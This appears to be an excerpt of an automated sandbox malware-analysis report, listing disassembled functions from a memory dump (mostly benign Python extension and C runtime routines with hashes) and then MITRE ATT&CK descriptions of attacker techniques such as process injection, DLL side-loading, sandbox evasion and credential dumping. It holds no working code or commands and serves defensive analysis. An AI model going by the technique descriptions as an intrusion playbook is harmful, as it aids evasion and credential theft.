Function 00007FFBAB6A7400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A741A

Strings

bool, xrefs: 00007FFBAB6A7437
'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted, xrefs: 00007FFBAB6A7410

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
API String ID: 1450464846-604167972
Opcode ID: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
Instruction ID: ac644141ed3b2b58a54269ac7f12803c92ba12a31de27c18b76ada4abe042d6a
Opcode Fuzzy Hash: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
Instruction Fuzzy Hash: 65F03AA5F47A4281DD06977DECA01A4A370BB54754B94A235CD3C462F1EE1CE49A8700

Function 00007FFBAB6A7490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A74AA

Strings

'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted, xrefs: 00007FFBAB6A74A0
bool, xrefs: 00007FFBAB6A74C7

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
API String ID: 1450464846-232606992
Opcode ID: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
Instruction ID: 23b21e2db2c5efd89b80343f6d1c12867c32c87d555ed97b286fcb0d14599674
Opcode Fuzzy Hash: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
Instruction Fuzzy Hash: 35F03AA5F4BA0280DE06977DDCA01A4A371AB54750B94A235C92C422B1EE1CE49A8700

Function 00007FFBAB6A9450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A9464

Part of subcall function 00007FFBAB6A3520: PyObject_IsInstance.PYTHON312 ref: 00007FFBAB6A3530
Part of subcall function 00007FFBAB6A3520: PyObject_CallNoArgs.PYTHON312 ref: 00007FFBAB6A3542
Part of subcall function 00007FFBAB6A3520: PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A3556
Part of subcall function 00007FFBAB6A3520: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A356A

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9488

Strings

ratio, xrefs: 00007FFBAB6A9495

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
String ID: ratio
API String ID: 1069087923-4234197119
Opcode ID: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
Instruction ID: c89ac311a2ce402f20b6d1874c9c6560cf7577fd0d47088c9866153395a3948d
Opcode Fuzzy Hash: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
Instruction Fuzzy Hash: B0F0A9A5E4BA0680EE1B6BBDEC14275A3B4AF44B94F04F475CD2D062B5DE6CA0818740

Function 00007FFBAB6A9220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A9234

Part of subcall function 00007FFBAB6A3520: PyObject_IsInstance.PYTHON312 ref: 00007FFBAB6A3530
Part of subcall function 00007FFBAB6A3520: PyObject_CallNoArgs.PYTHON312 ref: 00007FFBAB6A3542
Part of subcall function 00007FFBAB6A3520: PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A3556
Part of subcall function 00007FFBAB6A3520: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A356A

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9258

Strings

feed, xrefs: 00007FFBAB6A9265

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
String ID: feed
API String ID: 1069087923-591414443
Opcode ID: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
Instruction ID: 9b820fe15edd7a11dd26e5b50c71ffaaa8b3f37301721c5fd324880993b90a8a
Opcode Fuzzy Hash: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
Instruction Fuzzy Hash: 17F0DAE5E5B60680FE176BBDEC65274A3B0AF58B90F04B039CD2D063B9DE2DE1458740

Function 00007FFBAB6A90F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A9104

Part of subcall function 00007FFBAB6A3520: PyObject_IsInstance.PYTHON312 ref: 00007FFBAB6A3530
Part of subcall function 00007FFBAB6A3520: PyObject_CallNoArgs.PYTHON312 ref: 00007FFBAB6A3542
Part of subcall function 00007FFBAB6A3520: PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A3556
Part of subcall function 00007FFBAB6A3520: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A356A

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9128

Strings

eligible, xrefs: 00007FFBAB6A9135

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
String ID: eligible
API String ID: 1069087923-1278981203
Opcode ID: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
Instruction ID: a92b151118e483f7d3bffdfad6f9d5d0bcdc629f32fc2edb2860311efa71bb56
Opcode Fuzzy Hash: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
Instruction Fuzzy Hash: 6AF0DAE9E4B60680FE166BBDEC58674A3B0AF59B90F04B439CC2D063B5DE7CE4818700

Function 00007FFBAB6A82C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A82DA

Strings

bool, xrefs: 00007FFBAB6A82F7
'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted, xrefs: 00007FFBAB6A82D0

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
API String ID: 1450464846-2595685569
Opcode ID: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
Instruction ID: b3f439956b1b900581caef0c7ff3c415a9a1500ab87d3cfe6896bb9beb83cb78
Opcode Fuzzy Hash: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
Instruction Fuzzy Hash: 14F03AA5E4790280DD06977DDCA0164A770BB54750BA8A235C92C422B1EE1CE59AC300

Function 00007FFBAB6A5390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A53AA

Strings

bool, xrefs: 00007FFBAB6A53C7
'TooManySymbolOrPunctuationPlugin' object attribute '_frenzy_symbol_in_word' cannot be deleted, xrefs: 00007FFBAB6A53A0

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_frenzy_symbol_in_word' cannot be deleted$bool
API String ID: 1450464846-825057536
Opcode ID: 7687b87dcfade708e71cb8af8033597d5e5aa7a4328c8a6f7437823f4d63887e
Instruction ID: 415c02d097aa4b910430641c04d0515e20a1f1d7dce1a35d8b951bc4bbff3e6b
Opcode Fuzzy Hash: 7687b87dcfade708e71cb8af8033597d5e5aa7a4328c8a6f7437823f4d63887e
Instruction Fuzzy Hash: 75F03AE1E4790290DD06A77DDCA0164B371AB54760FA4A635C92D422B1EE5CE49A8300

Function 00007FFBAB6A9350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A9364

Part of subcall function 00007FFBAB6A3520: PyObject_IsInstance.PYTHON312 ref: 00007FFBAB6A3530
Part of subcall function 00007FFBAB6A3520: PyObject_CallNoArgs.PYTHON312 ref: 00007FFBAB6A3542
Part of subcall function 00007FFBAB6A3520: PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A3556
Part of subcall function 00007FFBAB6A3520: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A356A

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9388

Strings

reset, xrefs: 00007FFBAB6A9395

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
String ID: reset
API String ID: 1069087923-1352515405
Opcode ID: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
Instruction ID: d744022fe88ec3acadc8e492c51b5a4d5de16ca6500983c0a5f1535a56d7160c
Opcode Fuzzy Hash: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
Instruction Fuzzy Hash: 70F0B7E5E4B60680EF2A6BB9EC54264A3B0AF98B90F44F039CD2D463B59E2CE1458740

Function 00007FFBAB6A8950 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A896A

Strings

bool, xrefs: 00007FFBAB6A8987
'ArchaicUpperLowerPlugin' object attribute '_current_ascii_only' cannot be deleted, xrefs: 00007FFBAB6A8960

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_current_ascii_only' cannot be deleted$bool
API String ID: 1450464846-1261582747
Opcode ID: 8c7019ae60389a316b38f34d8583e21c126b8065cf809baa2539fb2ca883be19
Instruction ID: f25c60fa356ad5fefea722d37234d34379872be8926ddd3f3c7bac35dafbb83c
Opcode Fuzzy Hash: 8c7019ae60389a316b38f34d8583e21c126b8065cf809baa2539fb2ca883be19
Instruction Fuzzy Hash: 07F05EE1E4790280DD06977DDCA01A4E771BB547A0FA4E235CE3C422F1EE1CE49AC300

Function 00007FFBAA585D05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBAA585D18
_msize.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBAA585D29

Strings

failed memory resize %u to %u bytes, xrefs: 00007FFBAA585D32

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: _msizerealloc
String ID: failed memory resize %u to %u bytes
API String ID: 2713192863-2134078882
Opcode ID: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
Instruction ID: a56344e1338de6e996bbac33464592852824f404ada9ac5232f537e4123eeb98
Opcode Fuzzy Hash: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
Instruction Fuzzy Hash: 61E030A1B0A681C1EA168BA6F9444796264AF48FC4B045174DE0E1BB19DF2CD543CB50

Function 00007FFBAA4625C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_PyObject_GC_New.PYTHON312(?,?,00000000,00007FFBAA462533), ref: 00007FFBAA4625C6
PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFBAA462533), ref: 00007FFBAA4625F8

Strings

3.2.0, xrefs: 00007FFBAA4625D4

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$Track
String ID: 3.2.0
API String ID: 16854473-1786766648
Opcode ID: f91d149df4c654f8be0df0ef2da4b36c9d06b56ee9d54162962ccaca08fa2000
Instruction ID: 57007e9496327d4258958be2b1d40b8d69e383cab3d9290936b9c0229aab952d
Opcode Fuzzy Hash: f91d149df4c654f8be0df0ef2da4b36c9d06b56ee9d54162962ccaca08fa2000
Instruction Fuzzy Hash: 36E0E5A4E1BB02E2EB168B31E8440A863ACAF18F44B5401B9DD4D02320EF3CE1A6C361

Function 00007FFBAA5CBE30 Relevance: 5.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBAA5C653C), ref: 00007FFBAA5CBF9A
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBAA5C653C), ref: 00007FFBAA5CBFC5
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBAA5C653C), ref: 00007FFBAA5CBFE1
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FFBAA5C653C), ref: 00007FFBAA5CC026

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
Instruction ID: 41850fe4d4adb8c556590d97df6377909d807a04258cd3d8d3f17dd52a5c3992
Opcode Fuzzy Hash: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
Instruction Fuzzy Hash: 9091C3B2A0A646C2EA66CF36D40077A77A8FB46B90F044175EE4D47B89CF3CD452CB18

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

